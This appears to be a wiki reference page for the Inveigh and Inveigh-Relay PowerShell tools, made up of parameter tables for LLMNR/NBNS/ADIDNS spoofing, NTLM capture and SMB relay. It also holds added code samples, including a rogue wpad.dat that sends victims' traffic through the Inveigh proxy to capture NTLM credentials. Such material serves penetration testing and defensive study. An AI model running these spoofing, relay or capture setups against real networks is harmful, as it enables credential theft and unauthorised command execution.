Parameters
Kevin Robertson edited this page Jul 31, 2019 · 36 revisions
To cover as many use cases as possible, Inveigh has a lot of parameters (I'll admit it's an obnoxious amount at this point) for tweaking how Inveigh and Inveigh-Relay run. This page lists all current parameters with brief descriptions. The first four tables (spoofing, HTTP/proxy, console and file output, general) belong to Invoke-Inveigh; the last four (attack, HTTP/proxy, console and file output, general) belong to Inveigh-Relay. A blank Default column means the parameter has no preset value.
Parameter | Default | Valid Values | Description |
---|---|---|---|
ADIDNS | | Combo, NS, Wildcard | Comma separated list of ADIDNS spoofing attacks. Combo watches LLMNR/NBNS requests and adds a DNS record once the same name has been requested by multiple systems (see ADIDNSThreshold). NS injects an NS record and, if needed, a target record; this is primarily for the GQBL bypass for wpad and can be used together with Inveigh's DNS spoofer. Wildcard injects a wildcard record. |
ADIDNSACE | Y | Y/N | Enable/Disable adding an 'Authenticated Users' full control ACE to any added records. |
ADIDNSCleanup | Y | Y/N | Enable/Disable removing added ADIDNS records upon shutdown. |
ADIDNSCredential | | | PSCredential object that will be used for ADIDNS spoofing. |
ADIDNSDomain | | | The targeted domain in DNS format. |
ADIDNSDomainController | | | Domain controller to target. This parameter is mandatory on a non-domain attached system. |
ADIDNSForest | | | The targeted forest in DNS format. |
ADIDNSHostsIgnore | | | Comma separated list of hosts that will be ignored by ADIDNS spoofing. |
ADIDNSNSTarget | wpad2 | | Target hostname for the NS record created by the NS attack. An existing record can be used. |
ADIDNSPartition | DomainDNSZones | DomainDNSZones, ForestDNSZones, System | The AD partition name where the zone is stored. |
ADIDNSThreshold | 4 | | Threshold used to decide when the Combo attack injects an ADIDNS record. Inveigh tracks identical LLMNR and NBNS requests received from multiple systems and injects a DNS record once the number of systems making the identical request exceeds the threshold. |
ADIDNSTTL | 600 | | DNS TTL in seconds for added A records. |
ADIDNSZone | | | The ADIDNS zone. |
LLMNR | Y | Y/N | Enable/Disable the LLMNR spoofer. |
LLMNRTTL | 30 Seconds | | LLMNR TTL in seconds for the response packet. |
mDNS | N | Y/N | Enable/Disable mDNS spoofing. |
mDNSTTL | 120 Seconds | | mDNS TTL in seconds for the response packet. |
mDNSTypes | QU | QU, QM | Comma separated list of mDNS query types to spoof. Note that QM sends the response to the mDNS multicast address 224.0.0.251 rather than unicast to the requester. |
NBNS | N | Y/N | Enable/Disable the NBNS spoofer. |
NBNSTTL | 165 Seconds | | NBNS TTL in seconds for the response packet. |
NBNSTypes | 00,20 | 00,03,20,1B | Comma separated list of NBNS suffix types to spoof: 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name. |
NBNSBruteForce | N | Y/N | Enable/Disable the NBNS brute force spoofer. |
NBNSBruteForceHost | WPAD | | Hostname for the NBNS brute force spoofer. |
NBNSBruteForcePause | N | Seconds | Time in seconds that the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. |
SpooferHostsIgnore | | | Comma separated list of requested hostnames to ignore when spoofing. |
SpooferHostsReply | | | Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames override the valid host list built through SpooferLearning. |
SpooferIP | Local IP | | Response IP address for spoofing. Only needed when redirecting victims to a system other than the Inveigh host. |
SpooferIPsIgnore | | | Comma separated list of source IP addresses to ignore when spoofing. |
SpooferIPsReply | | | Comma separated list of source IP addresses to respond to when spoofing. |
SpooferLearning | N | Y/N | Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh sends its own LLMNR/NBNS request for every hostname it sees requested. If a response is received, the hostname is added to a spoofing blacklist. The valid system must answer over the same protocol as the original request (LLMNR or NBNS) in order to be blacklisted. |
SpooferLearningDelay | | | Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning. |
SpooferLearningInterval | 30 Minutes | | Time in minutes that Inveigh will wait before sending another LLMNR/NBNS request for a hostname that has already been checked through SpooferLearning. |
SpooferRepeat | Y | Y/N | Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. |

Parameter | Default | Valid Values | Description |
---|---|---|---|
Challenge | | | 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge is generated for each request. Only used for non-relay captures. |
HTTP | Y | Y/N | Enable/Disable HTTP challenge/response capture. |
HTTPAuth | NTLM | Anonymous, Basic, NTLM, NTLMNoESS | HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests (see WPADAuth). NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. |
HTTPBasicRealm | | | Realm name for Basic authentication. Applies to both HTTPAuth and WPADAuth. |
HTTPContentType | text/html | | Content type for HTTP/HTTPS responses. Does not apply to EXEs or wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. |
HTTPDefaultEXE | | | EXE filename within HTTPDirectory to serve as the default HTTP/HTTPS response for EXE requests. |
HTTPDefaultFile | | | Filename within HTTPDirectory to serve as the default HTTP/HTTPS response file. Not used for wpad.dat requests. |
HTTPDirectory | | | Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. |
HTTPIP | 0.0.0.0 | | IP address for the HTTP listener. |
HTTPPort | 80 | | TCP port for the HTTP listener. |
HTTPResetDelayTimeout | 30 Seconds | | HTTPResetDelay timeout in seconds. |
HTTPResponse | | | String or HTML to serve as the default HTTP/HTTPS response. Not used for wpad.dat requests, and ignored if HTTPDirectory is set. Use PowerShell character escapes where necessary. |
HTTPS | N | Y/N | Enable/Disable HTTPS challenge/response capture. Warning: a certificate will be installed in the local store. If the script does not exit gracefully, remove the certificate manually. This feature requires local administrator access. |
HTTPSCertIssuer | Inveigh | | The issuer field for the certificate installed for HTTPS. |
HTTPSCertSubject | localhost | | The subject field for the certificate installed for HTTPS. |
HTTPSForceCertDelete | N | Y/N | Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. |
HTTPSPort | 443 | | TCP port for the HTTPS listener. |
Proxy | N | Y/N | Enable/Disable proxy server authentication captures. |
ProxyAuth | NTLM | Basic, NTLM, NTLMNoESS | Proxy server authentication type. |
ProxyIgnore | Firefox | | Comma separated list of keywords used to filter browser user agents. Matching browsers are not sent the wpad.dat file used for capturing proxy authentication. Firefox does not work correctly with the proxy server failover setup and is left unable to connect to any site until the proxy setting is cleared. Remove "Firefox" from this list to attack Firefox; if you do, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening the browser. |
ProxyIP | 0.0.0.0 | | IP address for the proxy listener. |
ProxyPort | 8492 | | TCP port for the proxy listener. |
WPADAuth | NTLM | Anonymous, Basic, NTLM, NTLMNoESS | HTTP/HTTPS server authentication type for wpad.dat requests. Setting Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. |
WPADAuthIgnore | Firefox | | Comma separated list of keywords used to filter browser user agents. Matching browsers are skipped for NTLM authentication. This can be used to filter out browsers such as Firefox that display login popups for authenticated wpad.dat requests. |
WPADDirectHosts | | | Comma separated list of hosts to list as DIRECT in the wpad.dat file. Listed hosts will not be routed through the defined proxy. |
WPADIP | | | Proxy server IP to include in the basic wpad.dat response for WPAD enabled browsers. Must be used together with WPADPort. |
WPADPort | | | Proxy server port to include in the basic wpad.dat response for WPAD enabled browsers. Must be used together with WPADIP. |
WPADResponse | | | wpad.dat file contents to serve as the wpad.dat response. Ignored if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. |
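
The WPADIP/WPADPort/WPADDirectHosts parameters generate a basic wpad.dat for you; when you need more control (glob patterns, extra rules) you build the file yourself and pass it through WPADResponse. The following is an added example, not code from the Inveigh project: it assembles a PAC file in a PowerShell here-string so that no character escaping is needed, expresses the same policy the built-in options produce (listed hosts DIRECT, everything else through the proxy with DIRECT as failover), and hands it to Invoke-Inveigh. The address 10.0.0.5, the DIRECT host patterns and the use of shExpMatch are this example's assumptions; the port is the ProxyPort default from the table.

```powershell
# Added example (not Inveigh's own wpad.dat generator). Assumes 10.0.0.5 is the
# address clients can reach the Inveigh host on; the DIRECT patterns are made up.
$ProxyIP     = '10.0.0.5'
$ProxyPort   = 8492                                    # ProxyPort default
$DirectHosts = 'intranet.corp.example', '*.patch.corp.example'

# One "return DIRECT" rule per pattern. shExpMatch is a standard PAC helper
# that supports the * glob, which the comma separated WPADDirectHosts list does not.
$directRules = ($DirectHosts | ForEach-Object {
    "    if (shExpMatch(host, `"$_`")) return `"DIRECT`";"
}) -join "`n"

# Expandable here-string: $directRules and ${ProxyIP}/${ProxyPort} are substituted,
# while the double quotes inside the JavaScript stay literal (no backtick escapes).
$WPADResponse = @"
function FindProxyForURL(url, host) {
$directRules
    // Everything else goes through the Inveigh proxy listener, where ProxyAuth
    // collects the authentication. DIRECT is the failover if the proxy is gone.
    return "PROXY ${ProxyIP}:${ProxyPort}; DIRECT";
}
"@

# Leave WPADIP/WPADPort unset: if both are set, WPADResponse is ignored.
# WPADAuth Anonymous avoids a login prompt for the wpad.dat download itself;
# the NTLM capture happens on the proxy listener instead.
Invoke-Inveigh -ConsoleOutput Y -Proxy Y -ProxyPort $ProxyPort -WPADAuth Anonymous -WPADResponse $WPADResponse
```

Because ProxyIgnore defaults to Firefox, Firefox clients are still not served this file; the same failover caveat from the ProxyIgnore row applies if you remove that filter.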

Parameter | Default | Valid Values | Description |
---|---|---|---|
ConsoleOutput | N | Low, Medium, Y, N | Enable/Disable real time console output. If using this option through a shell, test first to make sure it doesn't hang the shell. Medium and Low reduce the amount of output. |
ConsoleQueueLimit | | | Maximum number of queued console log entries when not using the real time console. |
ConsoleStatus | N | | Interval in minutes for displaying all unique captured hashes and credentials. Useful for displaying full capture lists when running through a shell that does not have access to the support functions. |
ConsoleUnique | Y | Y/N | Enable/Disable displaying challenge/response hashes only for unique IP, domain/hostname, and username combinations when real time console output is enabled. |
FileOutput | N | Y/N | Enable/Disable real time file output. |
FileOutputDirectory | | | Valid path to an output directory for log and capture files. FileOutput must also be enabled. |
FileUnique | Y | Y/N | Enable/Disable writing challenge/response hashes only for unique IP, domain/hostname, and username combinations when real time file output is enabled. |
LogOutput | Y | Y/N | Enable/Disable storing log messages in memory. |
OutputStreamOnly | N | Y/N | Enable/Disable forcing all output to the standard output stream. Helpful when running Inveigh through a shell that does not return the other output streams. Note that the yellow warning messages are not shown when this is enabled. |
Pcap | | File, Memory | Dump packets to a pcap file or to memory. Requires elevated privilege. With 'Memory', the packets are written to the $inveigh.pcap ArrayList. |
PcapTCP | 139, 445 | | Comma separated list of TCP ports used to filter which packets are written to the pcap. Use 'All' to capture on all ports. |
PcapUDP | | | Comma separated list of UDP ports used to filter which packets are written to the pcap. Use 'All' to capture on all ports. |
ShowHelp | Y | Y/N | Enable/Disable the help messages at startup. |
StatusOutput | Y | Y/N | Enable/Disable startup and shutdown messages. |

Parameter | Default | Valid Values | Description |
---|---|---|---|
Elevated | Auto | Auto/Y/N | Set the privilege mode. Auto determines whether Inveigh is running with elevated privilege; if so, options that require elevated privilege can be used. |
Inspect | | | Switch that disables LLMNR, NBNS, HTTP, HTTPS, and SMB so that Inveigh only inspects LLMNR/NBNS traffic. |
IP | | | Local IP address for listening and packet sniffing. Also used for LLMNR/mDNS/NBNS spoofing if SpooferIP is not set. |
MachineAccounts | N | Y/N | Enable/Disable showing NTLM challenge/response captures from machine accounts. |
SMB | Y | Y/N | Enable/Disable SMB challenge/response capture. Warning: LLMNR/NBNS spoofing can still direct targets to the host system's own SMB server. Block TCP ports 445/139 or stop the SMB services if you need to prevent login requests from being processed by the Inveigh host. |
StartupChecks | Y | Y/N | Enable/Disable checks for in-use ports and running services on startup. |
RunCount | | | Number of NTLMv1/NTLMv2 captures to perform before auto-exiting. |
RunTime | | | Run time duration in minutes. |
Tool | 0 | 0/1/2 | Enable features for better operation through external tools such as Metasploit's Interactive PowerShell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire |
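
The SMB row above warns that disabling capture with -SMB N does not stop the Windows SMB server on the Inveigh host from accepting the logons that LLMNR/NBNS spoofing redirects to it. The following is an added helper, not part of Inveigh, that applies the suggested block: it adds a temporary inbound Windows Firewall rule for TCP 139/445, reports whether anything is still listening on those ports, and removes the rule again afterwards. The rule name and the use of the NetSecurity and NetTCPIP modules (Windows 8/Server 2012 and later) are this example's own choices; run it from an elevated prompt, and do not use it when you actually want SMB capture (-SMB Y).

```powershell
# Added helper (not Inveigh code). Assumes the NetSecurity/NetTCPIP modules are
# available and the session is elevated. Rule name is arbitrary.
$RuleName = 'Inveigh engagement - block inbound SMB'

function Block-LocalSMB {
    # Idempotent: only create the rule once even if this is run repeatedly.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP `
            -LocalPort 139,445 -Action Block | Out-Null
        Write-Host "Added inbound block rule '$RuleName' for TCP 139/445"
    } else {
        Write-Host "Rule '$RuleName' already present"
    }

    # The SMB server keeps its sockets open behind the firewall; the rule, not the
    # listener state, is what prevents the redirected logons from being processed.
    $listening = @(Get-NetTCPConnection -LocalPort 139,445 -State Listen -ErrorAction SilentlyContinue)
    if ($listening.Count -gt 0) {
        $ports = ($listening | ForEach-Object { $_.LocalPort } | Sort-Object -Unique) -join ', '
        Write-Host "SMB still listening on $ports; inbound connections are now dropped by the rule"
    } else {
        Write-Host "Nothing listening on TCP 139/445"
    }
}

function Unblock-LocalSMB {
    Remove-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue
    Write-Host "Removed rule '$RuleName' (if it existed)"
}

# Typical use around a spoofing run that does not need SMB capture:
Block-LocalSMB
# Invoke-Inveigh -ConsoleOutput Y -SMB N ...
# Unblock-LocalSMB   # run when the engagement ends
```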

Parameter | Default | Valid Values | Description |
---|---|---|---|
Attack | Enumerate, Session | Enumerate, Execute, Session | Comma separated list of attacks to perform with relay. Enumerate leverages relay to perform enumeration on target systems; the collected data is used for target selection. Execute performs PSExec style command execution. Session creates and maintains authenticated SMB sessions that can be interacted with through Invoke-TheHash's Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec. |
Command | | | Command to execute on the SMB relay target. Use PowerShell character escapes where necessary. |
DomainMapping | | | Array to map one NetBIOS domain to one DNS domain. Needed when attacking a domain from a non-domain attached system with data imported from BloodHound. |
Enumerate | All | All, Group, NetSession, Share, User | The action used for the 'Enumerate' attack. |
EnumerateGroup | Administrators | | The group enumerated by the 'Enumerate' attack. Note that only the 'Administrators' group is used for targeting decisions. |
FailedLoginStrict | N | Y/N | If disabled, failed login attempts against non-domain attached systems do not count as failed logins. If enabled, all failed logins count. |
FailedLoginThreshold | 2 | | Threshold for failed logins. Once failed logins for a user exceed the threshold, further relay attempts for that user are stopped. |
RelayAutoDisable | Y | Y/N | Automatically disable SMB relay after a successful command execution on a target. |
RelayAutoExit | Y | Y/N | Enable/Disable automatically exiting after relay is disabled due to success or error. |
RepeatEnumerate | 30 | | Minimum number of minutes to wait between enumeration attempts against a target. |
RepeatExecute | 30 | | Minimum number of minutes to wait between command execution attempts against a target. |
Service | | | Name of the service to create and delete on the target. |
SessionLimitPriv | 2 | | Limit of privileged sessions on a target. |
SessionLimitShare | 2 | | Limit of sessions per user for targets hosting custom shares. |
SessionLimitUnpriv | 0 | | Limit of unprivileged sessions on a target. |
SessionRefresh | 10 | | Number of minutes between refreshes to keep sessions from timing out. |
Target | | | Comma separated list of IP addresses to target for relay. Accepts single addresses, CIDR, or ranges in the format 192.168.0.1-192.168.0.10 or 192.168.0.1-10. Avoid large ranges with lots of unused IP addresses or systems not running SMB. Inveigh-Relay does quick port checks as part of target selection and filters out invalid targets, but something like a /16 with only a few hosts isn't really practical. |
TargetExclude | | | Comma separated list of IP addresses to exclude from the target list. Accepts the same formats as the 'Target' parameter. |
TargetMode | Random | Random, Strict | 'Random' falls back to selecting a random target if a match isn't found in the enumerated data. 'Strict' only selects targets through enumerated data. Note that 'Strict' requires either previously collected data from the 'Enumerate' attack or data imported from BloodHound. |
TargetRandom | Y | Y/N | Enable/Disable selecting a random target if a target is not found through logic. |
TargetRefresh | 60 | | Number of minutes to wait before rechecking a target for eligibility. |
Username | | | Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username formats. |
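
The Target and TargetExclude rows accept four notations, and the warning about oversized ranges is easy to trip over when a CIDR block or a long-form range expands further than intended. The following is an added example, not Inveigh-Relay's own target handling: a parser for the four documented formats that expands them to the concrete IPv4 list with excludes removed, so you can preview what a Target/TargetExclude combination really covers before passing the same strings to Inveigh-Relay. The MaxHosts cap (4096 by default) is this example's own guard against oversized ranges; Inveigh-Relay's port-check filtering is not reproduced.

```powershell
# Added example (not Inveigh-Relay code): expand Target/TargetExclude notations.
# IPv4 only. MaxHosts is this example's own sanity limit, not an Inveigh parameter.

function ConvertTo-IPv4Int {
    param([string]$Address)
    $bytes = [System.Net.IPAddress]::Parse($Address).GetAddressBytes()
    if ($bytes.Length -ne 4) { throw "Not an IPv4 address: $Address" }
    # Octets are big-endian; build the value in Int64 to avoid UInt32 promotion surprises.
    return (([int64]$bytes[0]) -shl 24) -bor (([int64]$bytes[1]) -shl 16) -bor (([int64]$bytes[2]) -shl 8) -bor ([int64]$bytes[3])
}

function ConvertFrom-IPv4Int {
    param([int64]$Value)
    return '{0}.{1}.{2}.{3}' -f (($Value -shr 24) -band 255), (($Value -shr 16) -band 255), (($Value -shr 8) -band 255), ($Value -band 255)
}

function Expand-RelayTarget {
    param(
        [Parameter(Mandatory)][string[]]$Target,
        [string[]]$TargetExclude = @(),
        [int]$MaxHosts = 4096
    )
    $ipv4 = '\d{1,3}(?:\.\d{1,3}){3}'

    function Expand-Entry([string]$Entry) {
        $Entry = $Entry.Trim()
        if ($Entry -match "^($ipv4)/(\d{1,2})$") {
            # CIDR: the whole block, network and broadcast addresses included
            $prefix = [int]$Matches[2]
            if ($prefix -gt 32) { throw "Invalid prefix length in '$Entry'" }
            $mask  = (0xFFFFFFFF -shl (32 - $prefix)) -band 0xFFFFFFFF
            $start = (ConvertTo-IPv4Int $Matches[1]) -band $mask
            $end   = $start -bor ((-bnot $mask) -band 0xFFFFFFFF)
        }
        elseif ($Entry -match "^($ipv4)-($ipv4)$") {
            # long range form: 192.168.0.1-192.168.0.10
            $start = ConvertTo-IPv4Int $Matches[1]
            $end   = ConvertTo-IPv4Int $Matches[2]
        }
        elseif ($Entry -match "^(\d{1,3}(?:\.\d{1,3}){2})\.(\d{1,3})-(\d{1,3})$") {
            # short range form: 192.168.0.1-10 (only the last octet varies)
            $start = ConvertTo-IPv4Int "$($Matches[1]).$($Matches[2])"
            $end   = ConvertTo-IPv4Int "$($Matches[1]).$($Matches[3])"
        }
        elseif ($Entry -match "^$ipv4$") {
            $start = ConvertTo-IPv4Int $Entry
            $end   = $start
        }
        else { throw "Unrecognised target format: '$Entry'" }

        if ($start -gt $end) { throw "Range '$Entry' runs backwards" }
        if (($end - $start + 1) -gt $MaxHosts) {
            throw "'$Entry' expands to $($end - $start + 1) addresses; narrow it (MaxHosts = $MaxHosts)"
        }
        for ($i = $start; $i -le $end; $i++) { ConvertFrom-IPv4Int $i }
    }

    $included = @(foreach ($entry in $Target)        { Expand-Entry $entry })
    $excluded = @(foreach ($entry in $TargetExclude) { Expand-Entry $entry })

    # Keep first-seen order; drop duplicates and anything covered by TargetExclude.
    $seen = @{}
    foreach ($ip in $included) {
        if ($seen.ContainsKey($ip) -or $excluded -contains $ip) { continue }
        $seen[$ip] = $true
        $ip
    }
}

# Constructed input: both range forms plus a /30, with one host excluded.
Expand-RelayTarget -Target '192.168.0.1-192.168.0.4', '192.168.0.8-10', '192.168.1.0/30' -TargetExclude '192.168.0.2'
```

A /16 trips the MaxHosts guard immediately, which is the same point the Target row makes: if the expanded list is mostly unused addresses, narrow the ranges (or raise the exclude list) before starting the relay.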

Parameter | Default | Valid Values | Description |
---|---|---|---|
Challenge | | | 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge is generated for each request. Note that during SMB relay attempts the challenge is taken from the SMB relay target. |
HTTP | Y | Y/N | Enable/Disable HTTP challenge/response capture. |
HTTPIP | 0.0.0.0 | | IP address for the HTTP/HTTPS listener. |
HTTPPort | 80 | | TCP port for the HTTP listener. |
HTTPResetDelay | Firefox | | Comma separated list of keywords used to filter browser user agents. Matching browsers get a delay before their connections are reset when Inveigh doesn't receive data. This can increase the chance of capturing/relaying authentication through a popup box with some browsers (Firefox). |
HTTPResetDelayTimeout | 30 Seconds | Seconds | HTTPResetDelay timeout in seconds. |
HTTPS | N | Y/N | Enable/Disable HTTPS challenge/response capture. Warning: a certificate will be installed in the local store and bound to port 443. If the script does not exit gracefully, run "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the certificate store. |
HTTPSCertIssuer | Inveigh | | The issuer field for the certificate installed for HTTPS. |
HTTPSCertSubject | localhost | | The subject field for the certificate installed for HTTPS. |
HTTPSForceCertDelete | Y | Y/N | Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. |
Proxy | N | Y/N | Enable/Disable proxy server authentication captures. |
ProxyIgnore | Firefox | | Comma separated list of keywords used to filter browser user agents. Matching browsers are not sent the wpad.dat file used for capturing proxy authentication. Firefox does not work correctly with the proxy server failover setup and is left unable to connect to any site until the proxy setting is cleared. Remove "Firefox" from this list to attack Firefox; if you do, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening the browser. |
ProxyIP | 0.0.0.0 | | IP address for the proxy listener. |
ProxyPort | 8492 | | TCP port for the proxy listener. |
WPADAuth | NTLM | Anonymous, NTLM | HTTP/HTTPS server authentication type for wpad.dat requests. Setting Anonymous can prevent browser login prompts. |
WPADAuthIgnore | N | | Comma separated list of keywords used to filter browser user agents. Matching browsers are skipped for NTLM authentication. This can be used to filter out browsers such as Firefox that display login popups for authenticated wpad.dat requests. |
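
Both HTTPS rows on this page (Invoke-Inveigh and Inveigh-Relay) warn that an ungraceful exit leaves a certificate, and for the relay an HTTP.sys SSL binding, on the host. The following is an added cleanup helper, not part of Inveigh, that performs the two manual steps the relay row describes and reports what it found. It assumes the defaults from the tables (issuer "Inveigh", subject "localhost", listener 0.0.0.0:443) and that the installed certificate's Issuer and Subject distinguished names contain "CN=<HTTPSCertIssuer>" and "CN=<HTTPSCertSubject>"; pass different values if you ran with other settings. Run it from an elevated prompt.

```powershell
# Added cleanup helper (not Inveigh code). Assumes the certificate DNs contain
# CN=<issuer> / CN=<subject> as configured through HTTPSCertIssuer/HTTPSCertSubject.
function Remove-InveighHTTPSLeftovers {
    param(
        [string]$CertIssuer  = 'Inveigh',    # HTTPSCertIssuer default
        [string]$CertSubject = 'localhost',  # HTTPSCertSubject default
        [string]$ListenIP    = '0.0.0.0',
        [int]$ListenPort     = 443           # HTTPSPort default
    )
    $ipport = "${ListenIP}:${ListenPort}"

    # 1. SSL binding in HTTP.sys. "show sslcert" prints a "Certificate Hash" line
    #    only when a binding exists for this ip:port, so match on that instead of
    #    parsing exit codes.
    $binding = & netsh http show sslcert "ipport=$ipport" 2>&1 | Out-String
    if ($binding -match 'Certificate Hash') {
        Write-Host "Removing SSL binding on $ipport"
        & netsh http delete sslcert "ipport=$ipport" | Out-Null
    } else {
        Write-Host "No SSL binding found on $ipport"
    }

    # 2. The self-signed certificate in Local Computer\Personal (Cert:\LocalMachine\My).
    #    Match on the Inveigh issuer and subject rather than touching anything else.
    $certs = @(Get-ChildItem -Path Cert:\LocalMachine\My |
        Where-Object { $_.Issuer -like "*CN=$CertIssuer*" -and $_.Subject -like "*CN=$CertSubject*" })
    if ($certs.Count -eq 0) {
        Write-Host "No certificate with subject CN=$CertSubject from issuer CN=$CertIssuer found"
    }
    foreach ($cert in $certs) {
        Write-Host "Removing certificate $($cert.Thumbprint) ($($cert.Subject), issued by $($cert.Issuer))"
        Remove-Item -Path "Cert:\LocalMachine\My\$($cert.Thumbprint)"
    }
}

Remove-InveighHTTPSLeftovers
```

Running it after a clean exit is harmless: it simply reports that no binding and no matching certificate were found. If you changed HTTPSCertIssuer, HTTPSCertSubject, HTTPIP or HTTPSPort, pass the same values as -CertIssuer, -CertSubject, -ListenIP and -ListenPort.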

Parameter | Default | Valid Values | Description |
---|---|---|---|
ConsoleOutput | N | Low, Medium, Y, N | Enable/Disable real time console output. If using this option through a shell, test first to make sure it doesn't hang the shell. Medium and Low reduce the amount of output. |
ConsoleQueueLimit | | | Maximum number of queued console log entries when not using the real time console. |
ConsoleStatus | N | | Interval in minutes for displaying all unique captured hashes and credentials. Useful for displaying full capture lists when running through a shell that does not have access to the support functions. |
ConsoleUnique | Y | Y/N | Enable/Disable displaying challenge/response hashes only for unique IP, domain/hostname, and username combinations when real time console output is enabled. |
FileOutput | N | Y/N | Enable/Disable real time file output. |
FileOutputDirectory | Working Directory | | Valid path to an output directory for log and capture files. FileOutput must also be enabled. |
LogOutput | Y | Y/N | Enable/Disable storing log messages in memory. |
OutputStreamOnly | N | Y/N | Enable/Disable forcing all output to the standard output stream. Helpful when running Inveigh-Relay through a shell that does not return the other output streams. Note that the yellow warning messages are not shown when this is enabled. |
ShowHelp | Y | Y/N | Enable/Disable the help messages at startup. |
StatusOutput | Y | Y/N | Enable/Disable startup and shutdown messages. |

Parameter | Default | Valid Values | Description |
---|---|---|---|
MachineAccounts | N | Y/N | Enable/Disable showing NTLM challenge/response captures from machine accounts. |
RunTime | | | Run time duration in minutes. |
Tool | 0 | 0/1/2 | Set features for better operation through external tools such as Metasploit's Interactive PowerShell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire |